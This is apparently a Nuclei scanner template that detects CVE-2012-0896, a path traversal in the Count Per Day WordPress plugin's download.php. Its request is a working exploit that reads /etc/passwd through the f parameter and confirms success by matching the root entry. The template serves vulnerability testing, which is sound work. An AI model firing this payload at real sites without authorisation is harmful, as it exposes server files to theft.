id: CVE-2012-0896

info:
  name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
  author: daffainfo
  severity: high
  description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
  reference:
    - https://packetstormsecurity.com/files/108631/
    - https://www.cvedetails.com/cve/CVE-2012-0896
  tags: cve,cve2012,lfi,wordpress,wp-plugin

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200